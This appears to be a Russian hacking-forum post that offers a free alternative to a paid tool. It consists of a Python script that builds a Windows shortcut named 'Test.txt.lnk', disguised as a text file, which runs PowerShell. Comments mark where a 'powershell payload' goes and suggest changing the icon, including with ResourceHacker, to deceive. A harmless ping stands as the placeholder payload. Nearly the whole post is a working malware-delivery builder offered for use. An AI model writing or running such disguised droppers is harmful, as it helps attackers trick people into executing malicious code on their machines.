Народная open source альтернатива (с вас 5000 EUR):
Python: Скопировать в буфер обмена
disk.yandex.ru
Python: Скопировать в буфер обмена
Code:
#pip install pywin32 winshell
import os
import winshell
from win32com.client import Dispatch
# Определяем путь к .lnk файлу
desktop = winshell.desktop()
path = os.path.join(desktop, "Test.txt.lnk")
# Создаем ссылку на Shell объект
shell = Dispatch('WScript.Shell')
# Создаем ярлык
shortcut = shell.CreateShortCut(path)
shortcut.TargetPath = "powershell.exe"
shortcut.Arguments = "-Command \"ping -r google.com\"" #Здесь powershell payload например
shortcut.WorkingDirectory = os.getenv("USERPROFILE")
shortcut.IconLocation = "powershell.exe, 0" #Иконку можете сменить на любую здесь или через ResourceHacker
shortcut.save()